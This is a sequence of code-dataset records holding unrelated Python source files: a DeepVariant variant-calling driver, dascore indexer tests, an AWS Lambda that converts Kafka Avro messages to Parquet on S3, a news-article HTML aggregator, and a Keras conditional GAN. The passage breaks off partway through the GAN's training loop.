tf.reshape(image, example_shape)\n image = tf.cast(image, tf.float32)\n image = tf.keras.applications.inception_v3.preprocess_input(image)\n variant = parsed_features['variant/encoded']\n alt_allele_indices = parsed_features['alt_allele_indices/encoded']\n return image, variant, alt_allele_indices\n\n ds = tf.data.TFRecordDataset.list_files(\n sharded_file_utils.normalize_to_sharded_file_pattern(path), shuffle=False)\n\n def load_dataset(filename):\n dataset = tf.data.TFRecordDataset(\n filename,\n buffer_size=_DEFAULT_PREFETCH_BUFFER_BYTES,\n compression_type='GZIP')\n return dataset\n\n ds = ds.interleave(\n load_dataset,\n cycle_length=_DEFAULT_INPUT_READ_THREADS,\n num_parallel_calls=tf.data.AUTOTUNE)\n if _LIMIT.value > 0:\n ds = ds.take(_LIMIT.value)\n\n image_variant_alt_allele_ds = ds.map(\n map_func=_parse_example, num_parallel_calls=tf.data.AUTOTUNE)\n\n image_variant_alt_allele_ds = image_variant_alt_allele_ds.batch(\n batch_size=FLAGS.batch_size).prefetch(tf.data.AUTOTUNE)\n return image_variant_alt_allele_ds\n\n\ndef call_variants(examples_filename: str, checkpoint_path: str,\n output_file: str):\n \"\"\"Main driver of call_variants.\"\"\"\n if FLAGS.kmp_blocktime:\n os.environ['KMP_BLOCKTIME'] = FLAGS.kmp_blocktime\n logging.vlog(3,\n 'Set KMP_BLOCKTIME to {}'.format(os.environ['KMP_BLOCKTIME']))\n\n # Read a single TFExample to make sure we're not loading an older version.\n first_example = dv_utils.get_one_example_from_examples_path(examples_filename)\n if first_example is None:\n logging.warning(\n 'Unable to read any records from %s. Output will contain '\n 'zero records.', examples_filename)\n tfrecord.write_tfrecords([], output_file)\n return\n\n # TODO: Check example shape and format and throw a readable\n # error if incorrect\n example_info_json = dv_utils.get_example_info_json_filename(\n examples_filename, 0)\n example_shape = get_shape_and_channels_from_json(example_info_json)[0]\n\n logging.info('Shape of input examples: %s', str(example_shape))\n\n if checkpoint_path is not None:\n model = modeling.inceptionv3(example_shape)\n model.load_weights(checkpoint_path).expect_partial()\n\n image_variant_alt_allele_ds = get_dataset(examples_filename, example_shape)\n\n with tfrecord.Writer(output_file) as writer:\n start_time = time.time()\n n_examples, n_batches = 0, 0\n for batch in image_variant_alt_allele_ds:\n predictions = model.predict_on_batch(batch[0])\n n_batches += 1\n for probabilities, variant, alt_allele_indices in zip(\n predictions, batch[1], batch[2]):\n n_examples += 1\n pred = {\n 'probabilities': probabilities,\n 'variant': variant.numpy(),\n 'alt_allele_indices': alt_allele_indices.numpy()\n }\n write_variant_call(writer, pred)\n duration = time.time() - start_time\n logging.log_every_n(\n logging.INFO,\n ('Processed %s examples in %s batches [%.3f sec per 100]'),\n _LOG_EVERY_N, n_examples, n_batches,\n (100 * duration) / n_examples)\n logging.info('Processed %s examples in %s batches [%.3f sec per 100]',\n n_examples, n_batches, (100 * duration) / n_examples)\n logging.info('Done calling variants from a total of %d examples.',\n n_examples)\n\n\ndef main(argv=()):\n with errors.clean_commandline_error_exit():\n if len(argv) > 1:\n errors.log_and_raise(\n 'Command line parsing failure: call_variants does not accept '\n 'positional arguments but some are present on the command line: '\n '\"{}\".'.format(str(argv)), errors.CommandLineError)\n del argv # Unused.\n proto_utils.uses_fast_cpp_protos_or_die()\n\n logging_level.set_from_flag()\n\n call_variants(\n examples_filename=FLAGS.examples,\n checkpoint_path=FLAGS.checkpoint,\n output_file=FLAGS.outfile)\n\n\nif __name__ == '__main__':\n flags.mark_flags_as_required([\n 'examples',\n 'outfile',\n 'checkpoint',\n ])\n app.run(main)\n","repo_name":"google/deepvariant","sub_path":"deepvariant/call_variants_keras.py","file_name":"call_variants_keras.py","file_ext":"py","file_size_in_byte":13575,"program_lang":"python","lang":"en","doc_type":"code","stars":2970,"dataset":"github-code","pt":"78"} +{"seq_id":"14844866509","text":"\"\"\"\nTests for indexing local file systems.\n\"\"\"\nimport shutil\nfrom contextlib import suppress\nfrom pathlib import Path\n\nimport pandas as pd\nimport pytest\nfrom packaging.version import parse as get_version\n\nimport dascore as dc\nfrom dascore.io.indexer import DirectoryIndexer\nfrom dascore.utils.patch import get_default_patch_name\n\n\n@pytest.fixture(scope=\"class\")\ndef basic_indexer(two_patch_directory):\n \"\"\"Return and indexer on the basic spool directory.\"\"\"\n return DirectoryIndexer(two_patch_directory)\n\n\n@pytest.fixture(scope=\"class\")\ndef adjacent_indexer(adjacent_spool_directory):\n \"\"\"Return and indexer on the basic spool directory.\"\"\"\n return DirectoryIndexer(adjacent_spool_directory).update()\n\n\n@pytest.fixture(scope=\"class\")\ndef diverse_indexer(diverse_spool_directory):\n \"\"\"Return and indexer on the basic spool directory.\"\"\"\n return DirectoryIndexer(diverse_spool_directory).update()\n\n\n@pytest.fixture(scope=\"class\")\ndef diverse_df(diverse_indexer):\n \"\"\"Return the contents of the diverse indexer\"\"\"\n return diverse_indexer()\n\n\n@pytest.fixture()\ndef diverse_df_reset_cache(diverse_indexer):\n \"\"\"Return the indexer with a reset cache\"\"\"\n return DirectoryIndexer(diverse_indexer.path)\n\n\n@pytest.fixture(params=[diverse_indexer, diverse_df_reset_cache])\ndef diverse_ind(request):\n \"\"\"Aggregate the diverse indexers\"\"\"\n return request.getfixturevalue(request.param.__name__)\n\n\n@pytest.fixture()\ndef empty_index(tmp_path_factory):\n \"\"\"Create an index around an empty directory.\"\"\"\n path = tmp_path_factory.mktemp(\"index_created_test\")\n return DirectoryIndexer(path).update()\n\n\nclass TestBasics:\n \"\"\"Basic tests for indexer\"\"\"\n\n def test_str_repr(self, basic_indexer):\n \"\"\"Ensure a useful (not the default) str/repr is implemented\"\"\"\n out = str(basic_indexer)\n assert \"object at\" not in out\n\n def test_version(self, basic_indexer):\n \"\"\"Ensure the version written to file is correct.\"\"\"\n updated = basic_indexer.update()\n index_version = updated._index_table._index_version\n assert index_version == dc.__last_version__\n assert get_version(index_version) > get_version(\"0.0.1\")\n\n\nclass TestGetContents:\n \"\"\"Test cases for getting contents of indexer as dataframes.\"\"\"\n\n def test_get_contents(self, basic_indexer, two_patch_directory):\n \"\"\"Ensure contents are returned.\"\"\"\n out = basic_indexer()\n files = list(Path(two_patch_directory).rglob(\"*.hdf5\"))\n assert isinstance(out, pd.DataFrame)\n assert len(out) == len(files)\n names_df = {x.split(\"/\")[-1] for x in out[\"path\"]}\n names_files = {x.name for x in files}\n assert names_df == names_files\n\n def test_filter_large_starttime(self, diverse_df, diverse_ind):\n \"\"\"Ensure the index can be filtered by end time.\"\"\"\n max_starttime = diverse_df[\"time_min\"].max()\n filtered = diverse_df[diverse_df[\"time_min\"] >= max_starttime]\n out = diverse_ind(time_min=max_starttime)\n assert len(out) == len(filtered)\n\n def test_filter_small_starttime(self, diverse_df, diverse_ind):\n \"\"\"Ensure the index can be filtered by start time.\"\"\"\n min_endtime = diverse_df[\"time_max\"].min()\n filtered = diverse_df[diverse_df[\"time_max\"] <= min_endtime]\n out = diverse_ind(time_max=min_endtime)\n assert len(out) == len(filtered)\n\n def test_filter_station_exact(self, diverse_df, diverse_ind):\n \"\"\"Ensure contents can be filtered on time.\"\"\"\n # tests for filtering with exact station name\n exact_name = diverse_df[\"station\"].unique()[0]\n new_df = diverse_ind(station=exact_name)\n assert (new_df[\"station\"] == exact_name).all()\n\n def test_filter_isin(self, diverse_df, diverse_ind):\n \"\"\"Ensure contents can be filtered on time.\"\"\"\n # tests for filtering with exact station name\n exact_name = diverse_df[\"station\"].unique()[0]\n new_df = diverse_ind(station=exact_name)\n assert (new_df[\"station\"] == exact_name).all()\n\n def test_emtpy_index(self, empty_index):\n \"\"\"An empty index should return an empty dataframe.\"\"\"\n df = empty_index()\n assert df.empty\n\n\nclass TestUpdate:\n \"\"\"Tests for updating index.\"\"\"\n\n @pytest.fixture(scope=\"class\")\n def spool_directory_with_non_das_file(self, two_patch_directory, tmp_path_factory):\n \"\"\"Create a directory with some das files and some non-das files.\"\"\"\n new = tmp_path_factory.mktemp(\"unreadable_test\") / \"sub\"\n shutil.copytree(two_patch_directory, new)\n indexer = DirectoryIndexer(new)\n # remove index if it exists\n with suppress(FileNotFoundError):\n indexer.index_path.unlink()\n # add a non das file\n with open(new / \"not_das.open\", \"w\") as fi:\n fi.write(\"cant be das, can it?\")\n return new\n\n def test_add_one_patch(self, empty_index, random_patch):\n \"\"\"Ensure a new patch added to the directory shows up.\"\"\"\n path = empty_index.path / get_default_patch_name(random_patch)\n random_patch.io.write(path, file_format=\"dasdae\")\n new_index = empty_index.update()\n contents = new_index()\n assert len(contents) == 1\n\n def test_index_with_bad_file(self, spool_directory_with_non_das_file):\n \"\"\"Ensure if one file is not readable index continues.\"\"\"\n indexer = DirectoryIndexer(spool_directory_with_non_das_file)\n # if this doesn't fail the test passes\n updated = indexer.update()\n assert isinstance(updated, DirectoryIndexer)\n","repo_name":"d-chambers/dascore","sub_path":"tests/test_io/test_indexer.py","file_name":"test_indexer.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27665909610","text":"import os\nimport json\nimport boto3\nimport logging\nimport base64\nimport requests\nfrom pprint import pprint\nfrom datetime import datetime\n\nimport pandas as pd\nimport awswrangler as wr\n\nimport avro.schema\nfrom avro.io import DatumReader, BinaryDecoder\n\nfrom confluent_kafka.avro import AvroConsumer\nfrom confluent_kafka.serialization import SerializationContext, MessageField\nfrom confluent_kafka.serialization import IntegerDeserializer, StringDeserializer\nfrom confluent_kafka.schema_registry.avro import AvroDeserializer # for Kafka value\nfrom confluent_kafka.avro.serializer import SerializerError\nfrom confluent_kafka.schema_registry import SchemaRegistryClient, RegisteredSchema\nfrom confluent_kafka.schema_registry.error import SchemaRegistryError\n\n\nlogger = logging.getLogger()\nif logger.handlers:\n for handler in logger.handlers:\n logger.removeHandler(handler)\nlogging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)\n\nENV_TOPIC:str = os.getenv('INPUT_TOPIC')\nif ENV_TOPIC:\n logger.info(f'Found ENV Variable \"INPUT_TOPIC\". Value={ENV_TOPIC}')\nelse:\n raise Exception('Could not fined ENV Variable \"INPUT_TOPIC\".')\n \nENV_BASE_FOLDER:str = os.getenv('BASE_FOLDER')\nif ENV_BASE_FOLDER:\n logger.info(f'Found ENV Variable \"BASE_FOLDER\". Value={ENV_BASE_FOLDER}')\nelse:\n raise Exception('Could not fined ENV Variable \"BASE_FOLDER\".')\n\nTEST_S3_BUCKET:str='lineardp-conformance-common-flink-dev'\n\nTEST_SCHEMA_NAME:str=ENV_TOPIC # 'lndcdcadsprpsl_flightrange'\nTEST_S3_FOLDER:str=ENV_BASE_FOLDER # 'lambda_datasync_10k'\n\n# KMS_KEY_ARN:str='arn:aws:kms:us-east-1:550060283415:key/1c9916d5-8214-4a84-b4ed-ae5570e2ea43' # lineardp-credential-kms-dev\nKMS_KEY_ARN:str='arn:aws:kms:us-east-1:550060283415:key/2bb9d33c-8b5b-4f67-bccc-6d9f603d7609' # lineardp-conformed-kms-dev\n\nKEY_SERIALIZATION_CTX:SerializationContext = SerializationContext(topic=TEST_SCHEMA_NAME, field=MessageField.KEY)\nVALUE_SERIALIZATION_CTX:SerializationContext = SerializationContext(topic=TEST_SCHEMA_NAME, field=MessageField.VALUE)\n\nAVRO_SCHEMA_REGISTRY_BASE_URL:str='http://dev-cdp-schema-registry-pvt.us-east-1.espndev.pvt'\nSCHEMA_REGISTRY_CONF:dict={\"url\": AVRO_SCHEMA_REGISTRY_BASE_URL}\nAVRO_SCHEMA_REGISTRY_CLIENT:SchemaRegistryClient = SchemaRegistryClient(conf=SCHEMA_REGISTRY_CONF)\n\nUTF_8_DESERIALIZER:StringDeserializer = StringDeserializer('utf_8')\nINT_DESERIALIZER:IntegerDeserializer = IntegerDeserializer()\n\nVALUE_SCHEMA:str = None\n\ndef write_parquet_to_s3(topic:str, dataset:dict, column_names:list, bucket_name:str, base_folder:str) -> tuple:\n now_utc:datetime = datetime.utcnow()\n epoch = now_utc.timestamp()\n \n first_key = next(iter(dataset))\n first_value:list = dataset[first_key]\n total_records_count:int = len(first_value)\n \n distinct_src_key_val:set = set(dataset['SRC_KEY_VAL'])\n distinct_records_count:int = len(distinct_src_key_val)\n\n filename:str = f'{topic}_{epoch}_{total_records_count}_{distinct_records_count}.parquet'\n \n # yyyy/MM/dd\n partition_path:str = f'{now_utc.year}/{now_utc.month:02}/{now_utc.day:02}'\n s3_object_path:str = f'{base_folder}/{topic}/{partition_path}/{filename}'\n logger.info('Using S3 Bucket %s, S3 key: %s', bucket_name, s3_object_path)\n \n s3_uri:str = f's3://{bucket_name}/{s3_object_path}'\n logger.info('S3 URI: %s', s3_uri)\n \n try:\n df = pd.DataFrame(dataset, columns=column_names)\n wr.s3.to_parquet(df, s3_uri)\n return (s3_uri, total_records_count, distinct_records_count)\n except Exception as ex:\n logger.error(ex)\n return (None, None)\n\n\ndef get_AVRO_schema(base_schema_name:str) -> str:\n global VALUE_SCHEMA\n if None == VALUE_SCHEMA:\n value_schema_name:str = f'{base_schema_name}-value'\n schema_text:str = None\n \n # Method 1\n # schema_registry_url = f'{AVRO_SCHEMA_REGISTRY_BASE_URL}/subjects/{value_schema_name}/versions/latest'\n # logger.info('SCHEMA REGISTRY=%s', schema_registry_url)\n # response = requests.get(schema_registry_url)\n # if (response):\n # # pprint(dir(response))\n # logger.info('GET response code: %s', response.status_code)\n # schema_text = response.text\n # else:\n # logger.error('Unable to reach schema registry: %s', schema_registry_url)\n \n # Method 2\n # all_schemas = AVRO_SCHEMA_REGISTRY_CLIENT.get_subjects()\n # for schema in all_schemas:\n # logger.info('SCHEMA: %s', schema)\n try:\n found_schema:RegisteredSchema = AVRO_SCHEMA_REGISTRY_CLIENT.get_latest_version(subject_name=value_schema_name)\n logger.info('Found schema: %s', found_schema)\n VALUE_SCHEMA = found_schema.schema.schema_str\n except SchemaRegistryError as schema_reg_err:\n logger.error('ERROR %s', schema_reg_err)\n else:\n pass\n\n return VALUE_SCHEMA\n\ndef decode_key(encoded_key:str):\n decoded_key_bytes:bytes = base64.b64decode(encoded_key)\n # logger.debug('Encoded Key: %s', encoded_key)\n # logger.debug('Decoded Key: %s', decoded_key_bytes)\n \n try:\n logger.debug('1. Trying with String Deserializer')\n return UTF_8_DESERIALIZER(decoded_key_bytes, ctx=KEY_SERIALIZATION_CTX)\n except Exception as e1:\n logger.error('ERROR %s', e1)\n try:\n logger.debug('2. Trying with Integer Deserializer')\n return INT_DESERIALIZER(decoded_key_bytes, ctx=KEY_SERIALIZATION_CTX)\n except Exception as e2:\n logger.error('ERROR %s', e2)\n logger.debug('3. Trying with simple ASCII decode')\n return decoded_key_bytes.decode('ascii')\n \ndef decode_avro(schema:str, encoded_value:str) -> dict:\n decoded_value_bytes:bytes = base64.b64decode(encoded_value)\n # logger.debug('Encoded Value: %s', encoded_value)\n # logger.debug('Decoded Value: %s', decoded_value_bytes)\n\n schema_text:str = get_AVRO_schema(base_schema_name=schema)\n\n try:\n value_deserializer = AvroDeserializer(schema_str=schema_text, schema_registry_client=AVRO_SCHEMA_REGISTRY_CLIENT)\n return_values = value_deserializer(decoded_value_bytes, ctx=VALUE_SERIALIZATION_CTX)\n return return_values\n except Exception as ex:\n logger.error(\"ERROR while decoding AVRO\")\n logger.error(ex)\n decoded_value_bytes.seek(5)\n binary_decoder = BinaryDecoder(decoded_value_bytes)\n avro_schema = avro.schema.Parse(schema_text)\n avro_reader = DatumReader(avro_schema)\n return avro_reader.read(binary_decoder)\n\ndef lambda_handler(event, context):\n logger.info('Context: %s', context)\n\n logger.info('Event: %s', event)\n event_records = event['records']\n logger.info('Total records %d', len(event_records))\n \n avro_records:list = []\n \n fields_names:list = []\n datatypes_list:list = []\n dataset:dict = {}\n \n metadata_avail:bool = False\n\n for kafka_partition in event_records:\n logger.info('---')\n kafka_records = event['records'][kafka_partition]\n records_cnt:int = len(kafka_records)\n logger.info('Total %d records for partition: %s', records_cnt, kafka_partition)\n for krecord in kafka_records:\n krecord_key:str = krecord['key']\n decrypted_key = decode_key(encoded_key=krecord_key)\n\n krecord_val:str = krecord['value']\n # decrypted_val_bytes = base64.b64decode(krecord_val)\n decrypted_val = decode_avro(schema=TEST_SCHEMA_NAME, encoded_value=krecord_val)\n\n # logger.info('Orig Key=%s & Orig Value=%s', krecord_key, krecord_val)\n logger.info('%s===%s', decrypted_key, decrypted_val)\n \n if (not metadata_avail):\n for column_name in decrypted_val:\n fields_names.append(column_name)\n dataset[column_name] = []\n metadata_avail = True\n \n if (metadata_avail):\n for column_name in decrypted_val:\n existing_data_list:list = dataset[column_name]\n new_entry = decrypted_val[column_name]\n existing_data_list.append(new_entry)\n dataset[column_name] = existing_data_list\n \n return_json:json = json.dumps(dataset)\n # np_arr = np.asarray(dataset)\n # pprint(np_arr)\n \n return_tuple = write_parquet_to_s3(topic=TEST_SCHEMA_NAME, \\\n dataset=dataset, column_names=fields_names, \\\n bucket_name=TEST_S3_BUCKET, base_folder=TEST_S3_FOLDER)\n\n parquet_file_on_s3:str = return_tuple[0]\n\n if (parquet_file_on_s3):\n total_cnt:int = return_tuple[1]\n distinct_cnt:int = return_tuple[2]\n return_dict:dict = {\"s3_file\": parquet_file_on_s3, \"total_records\": total_cnt, \"distinct_records\": distinct_cnt}\n return {\n 'statusCode': 200,\n 'body': return_dict\n }\n else:\n return {\n 'statusCode': 500,\n 'body': f'Error converting to parquet or upload to S3: {TEST_S3_BUCKET}'\n }","repo_name":"productiveAnalytics/lambda_Kafka_to_S3_parquet","sub_path":"lambda_function_with_AWS_datawrangler.py","file_name":"lambda_function_with_AWS_datawrangler.py","file_ext":"py","file_size_in_byte":9124,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"35706133929","text":"\"\"\"\nModule intended to be run to aggregate news items into a \npickled dataframe to be used in analysis of news.\nDoes some cleaning, separates text, source, date, author.\n\"\"\"\nimport os\nimport re\nimport argparse\nimport pandas\nfrom bs4 import BeautifulSoup\n\nparser = argparse.ArgumentParser(description='News item aggregator into a pickled dataframe')\nparser.add_argument('--output', type=str, default='news_df.pkl',\n help='Name of the file for the pickled dataframe output')\nargs = parser.parse_args()\n\ndef extract_news(html, country):\n \"\"\"\n Cleans and separates elements of an article.\n args:\n html: html text from news article file\n country: country code from file\n output:\n A dictionary with the text, title, authors, date of the news article file.\n \"\"\"\n article_dict = {'filename': html.name, 'country': country}\n soup = BeautifulSoup(html, 'lxml')\n \n # title\n title0 = soup.find_all('div', {'class' : 'title'})\n # cleaning\n title1 = title0[0].text.replace('Hide Details', '')\n title = re.sub(r'\\<.*\\>', '', title1)\n article_dict['title'] = title\n\n # text\n body = soup.find_all('div', {'class' : 'body'})\n text0 = body[0].text.replace('\\n', ' ')\n \n # take out first word if all caps (it is a location)\n text1 = re.sub(r\"^([A-Z]{2,}\\s?[A-Z]{2,})\", \"\", text0)\n # take out from end\n text1 = re.sub(r'©.*$', '', text1)\n text2 = re.sub(r\"\\S*@\\S*\\s?\", \"ZXCVB\", text1) #email\n text3 = re.sub(r\"ZXCVB(.*)|Published by HT (.*)|Caption (.*)|Copyright\\s\\((.*)|Copyright: (.*)|Source- (.*)|Digital Content Services (.*)|Syndication with permission (.*)|www(.*)|http(.*)\", \"\", text2)\n # take out from middle \n text4 = re.sub(r\"(STORY CAN END HERE)\", \"\", text3)\n text5 = re.sub(r\"(EDITORS: STORY CAN END HERE)\", \"\", text4)\n text = re.sub(r\"(EDITORS: )\", \"\", text5)\n\n # take out all dots that are within parentheses (semantic parser dislikes that)\n def dots_in_parentheses(match):\n return re.sub(r'\\.', r';', match.group())\n parens = re.compile(r'(?<=\\()[^\\)]*?\\..[^\\(]*?(?=\\))')\n text = parens.sub(dots_in_parentheses, text)\n text = re.sub(r'\\.\"', '\".', text)\n article_dict['text'] = text\n\n # source & date\n source = soup.find_all('div', {'class' : 'source'})\n date = re.findall(r'(?:January|February|March|April|May|June|July|August|September|October|November|December)\\s\\d{1,2},\\s\\d{4}', source[0].text)\n article_dict['date'] = date[0]\n pat2 = re.compile(r\"(.*?)-\\s\", re.M)\n newssource = pat2.findall(source[0].text)\n article_dict['source'] = newssource[0]\n\n # author\n author0 = soup.find_all('span', {'class' : 'val'})\n author = re.sub(r'\\<.*\\>', '', author0[0].text) #Take out <>\n article_dict['author'] = author\n\n # section\n section0 = soup.find_all('span', {'class' : 'lbl'}, string=\"Section: \")\n try:\n section = section0[0].next_element.next_element.next_element.text\n article_dict['section'] = section\n except:\n article_dict['section'] = ''\n \n return article_dict\n\ndef aggregate_news_files():\n \"\"\"\n Runs through the news article data files, extracts the news and \n aggregates them into a pandas dataframe\n \"\"\"\n indir = './data/'\n article_list = []\n for root, _, filenames in os.walk(indir):\n for newsfile in filenames:\n filepath = os.path.join(root, newsfile)\n with open(filepath, 'r', encoding='utf-8') as testfile:\n try:\n article_dict = extract_news(testfile, newsfile[:2])\n article_list.append(article_dict)\n except:\n print(filepath)\n raise\n return pandas.DataFrame(article_list)\n\ndf = aggregate_news_files()\n\n\n# Take out duplicates\ndups = pandas.read_pickle('to_delete_index.pkl')\nnews_sorted = df.sort_values(by=['country','title'])\nnews_sorted.reset_index(inplace=True)\nnews_sorted.drop(['index'], axis=1, inplace=True)\ndf = news_sorted.loc[~news_sorted.index.isin(dups)] \n\n\ndf.to_pickle(args.output)\n\n","repo_name":"Moloq/climate-news-analyst","sub_path":"news_aggregator.py","file_name":"news_aggregator.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35518073469","text":"# -*- coding: utf-8 -*-\r\n# @Time : 2019/10/8 13:39\r\n# @Author : Dai PuWei\r\n# @File : CGAN.py\r\n# @Software: PyCharm\r\n\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\nimport datetime\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom scipy.stats import truncnorm\r\n\r\n\r\nfrom keras import Input\r\nfrom keras import Model\r\nfrom keras import Sequential\r\n\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Activation\r\nfrom keras.layers import Reshape\r\nfrom keras.layers import Conv2DTranspose\r\nfrom keras.layers import BatchNormalization\r\nfrom keras.layers import Conv2D\r\nfrom keras.layers import LeakyReLU\r\nfrom keras.layers import Dropout\r\nfrom keras.layers import Flatten\r\nfrom keras.layers.merge import multiply\r\nfrom keras.layers.merge import concatenate\r\nfrom keras.layers.merge import add\r\nfrom keras.layers import Embedding\r\nfrom keras.utils import to_categorical\r\nfrom keras.optimizers import Adam\r\nfrom keras.utils.generic_utils import Progbar\r\nfrom copy import deepcopy\r\nfrom keras.datasets import mnist\r\n\r\ndef make_trainable(net, val):\r\n \"\"\" Freeze or unfreeze layers\r\n \"\"\"\r\n net.trainable = val\r\n for l in net.layers: l.trainable = val\r\n\r\nclass CGAN(object):\r\n\r\n def __init__(self,config,weight_path=None):\r\n \"\"\"\r\n 这是CGAN的初始化函数\r\n :param config: 参数配置类实例\r\n :param weight_path: 权重文件地址,默认为None\r\n \"\"\"\r\n self.config = config\r\n self.build_cgan_model()\r\n\r\n if weight_path is not None:\r\n self.cgan.load_weights(weight_path,by_name=True)\r\n\r\n def build_cgan_model(self):\r\n \"\"\"\r\n 这是搭建CGAN模型的函数\r\n :return:\r\n \"\"\"\r\n # 初始化输入\r\n self.generator_noise_input = Input(shape=(self.config.generator_noise_input_dim,))\r\n self.condational_label_input = Input(shape=(1,), dtype='int32')\r\n self.discriminator_image_input = Input(shape=self.config.discriminator_image_input_dim)\r\n\r\n # 定义优化器\r\n self.optimizer = Adam(lr=2e-4, beta_1=0.5)\r\n\r\n # 构建生成器模型与判别器模型\r\n self.discriminator_model = self.build_discriminator_model()\r\n self.discriminator_model.compile(optimizer=self.optimizer, loss=['binary_crossentropy'],metrics=['accuracy'])\r\n self.generator_model = self.build_generator()\r\n\r\n # 构建CGAN模型\r\n self.discriminator_model.trainable = False\r\n self.cgan_input = [self.generator_noise_input,self.condational_label_input]\r\n generator_output = self.generator_model(self.cgan_input)\r\n cgan_output = self.discriminator_model([generator_output,self.condational_label_input])\r\n self.cgan = Model(self.cgan_input,cgan_output)\r\n\r\n # 编译\r\n #self.discriminator_model.compile(optimizer=self.optimizer,loss='binary_crossentropy')\r\n self.cgan.compile(optimizer=self.optimizer,loss=['binary_crossentropy'])\r\n\r\n def build_discriminator_model(self):\r\n \"\"\"\r\n 这是搭建生成器模型的函数\r\n :return:\r\n \"\"\"\r\n model = Sequential()\r\n\r\n model.add(Dense(512, input_dim=np.prod(self.config.discriminator_image_input_dim)))\r\n model.add(LeakyReLU(alpha=self.config.LeakyReLU_alpha))\r\n model.add(Dense(512))\r\n model.add(LeakyReLU(alpha=self.config.LeakyReLU_alpha))\r\n model.add(Dropout(self.config.LeakyReLU_alpha))\r\n model.add(Dense(512))\r\n model.add(LeakyReLU(alpha=self.config.LeakyReLU_alpha))\r\n model.add(Dropout(self.config.LeakyReLU_alpha))\r\n model.add(Dense(1, activation='sigmoid'))\r\n model.summary()\r\n\r\n img = Input(shape=self.config.discriminator_image_input_dim)\r\n label = Input(shape=(1,), dtype='int32')\r\n\r\n label_embedding = Flatten()(Embedding(self.config.condational_label_num,\r\n np.prod(self.config.discriminator_image_input_dim))(label))\r\n flat_img = Flatten()(img)\r\n model_input = multiply([flat_img, label_embedding])\r\n validity = model(model_input)\r\n\r\n return Model([img, label], validity)\r\n\r\n\r\n def build_generator(self):\r\n \"\"\"\r\n 这是构建生成器网络的函数\r\n :return:返回生成器模型generotor_model\r\n \"\"\"\r\n model = Sequential()\r\n\r\n model.add(Dense(256, input_dim=self.config.generator_noise_input_dim))\r\n model.add(LeakyReLU(alpha=self.config.LeakyReLU_alpha))\r\n model.add(BatchNormalization(momentum=self.config.batchnormalization_momentum))\r\n model.add(Dense(512))\r\n model.add(LeakyReLU(alpha=self.config.LeakyReLU_alpha))\r\n model.add(BatchNormalization(momentum=self.config.batchnormalization_momentum))\r\n model.add(Dense(1024))\r\n model.add(LeakyReLU(alpha=self.config.LeakyReLU_alpha))\r\n model.add(BatchNormalization(momentum=self.config.batchnormalization_momentum))\r\n model.add(Dense(np.prod(self.config.discriminator_image_input_dim), activation='tanh'))\r\n model.add(Reshape(self.config.discriminator_image_input_dim))\r\n\r\n model.summary()\r\n\r\n noise = Input(shape=(self.config.generator_noise_input_dim,))\r\n label = Input(shape=(1,), dtype='int32')\r\n label_embedding = Flatten()(Embedding(self.config.condational_label_num, self.config.generator_noise_input_dim)(label))\r\n\r\n model_input = multiply([noise, label_embedding])\r\n img = model(model_input)\r\n\r\n return Model([noise, label], img)\r\n\r\n def train(self, train_datagen, epoch, k, batch_size=256):\r\n \"\"\"\r\n 这是DCGAN的训练函数\r\n :param train_generator:训练数据生成器\r\n :param epoch:周期数\r\n :param batch_size:小批量样本规模\r\n :param k:训练判别器次数\r\n :return:\r\n \"\"\"\r\n time =datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\r\n model_path = os.path.join(self.config.model_dir,time)\r\n if not os.path.exists(model_path):\r\n os.mkdir(model_path)\r\n\r\n train_result_path = os.path.join(self.config.train_result_dir,time)\r\n if not os.path.exists(train_result_path):\r\n os.mkdir(train_result_path)\r\n\r\n for ep in np.arange(1, epoch+1).astype(np.int32):\r\n cgan_losses = []\r\n d_losses = []\r\n # 生成进度条\r\n length = train_datagen.batch_num\r\n progbar = Progbar(length)\r\n print('Epoch {}/{}'.format(ep, epoch))\r\n iter = 0\r\n while True:\r\n # 遍历一次全部数据集,那么重新来结束while循环\r\n #print(\"iter:{},{}\".format(iter,train_datagen.get_epoch() != ep))\r\n if train_datagen.epoch != ep:\r\n break\r\n\r\n # 获取真实图片,并构造真图对应的标签\r\n batch_real_images, batch_real_labels = train_datagen.next_batch()\r\n batch_real_num_labels = np.ones((batch_size, 1))\r\n #batch_real_num_labels = truncnorm.rvs(0.7, 1.2, size=(batch_size, 1))\r\n # 初始化随机噪声,伪造假图,并合并真图和假图数据集\r\n batch_noises = np.random.normal(0, 1, size = (batch_size, self.config.generator_noise_input_dim))\r\n d_loss = []\r\n for i in np.arange(k):\r\n # 构造假图标签,合并真图和假图对应标签\r\n batch_fake_num_labels = np.zeros((batch_size,1))\r\n #batch_fake_num_labels = truncnorm.rvs(0.0, 0.3, size=(batch_size, 1))\r\n batch_fake_labels = deepcopy(batch_real_labels)\r\n batch_fake_images = self.generator_model.predict([batch_noises,batch_fake_labels])\r\n\r\n # 训练判别器\r\n real_d_loss = self.discriminator_model.train_on_batch([batch_real_images,batch_real_labels],\r\n batch_real_num_labels)\r\n fake_d_loss = self.discriminator_model.train_on_batch([batch_fake_images, batch_fake_labels],\r\n batch_fake_num_labels)\r\n d_loss.append(list(0.5*np.add(real_d_loss,fake_d_loss)))\r\n #print(d_loss)\r\n d_losses.append(list(np.average(d_loss,0)))\r\n #print(d_losses)\r\n\r\n # 生成一个batch_size的噪声来训练生成器\r\n #batch_num_labels = truncnorm.rvs(0.7, 1.2, size=(batch_size, 1))\r\n batch_num_labels = np.ones((batch_size,1))\r\n batch_labels = np.random.randint(0, 10, batch_size).reshape(-1, 1)\r\n cgan_loss = self.cgan.train_on_batch([batch_noises,batch_labels], batch_num_labels)\r\n cgan_losses.append(cgan_loss)\r\n\r\n # 更新进度条\r\n progbar.update(iter, [('dcgan_loss', cgan_losses[iter]),\r\n ('discriminator_loss',d_losses[iter][0]),\r\n ('acc',d_losses[iter][1])])\r\n #print(\"%d [D loss: %f, acc.: %.2f%%] [G loss: %f]\" % (ep, d_losses[ep][0], 100 * d_losses[ep][1],cgan_loss))\r\n iter += 1\r\n if ep % 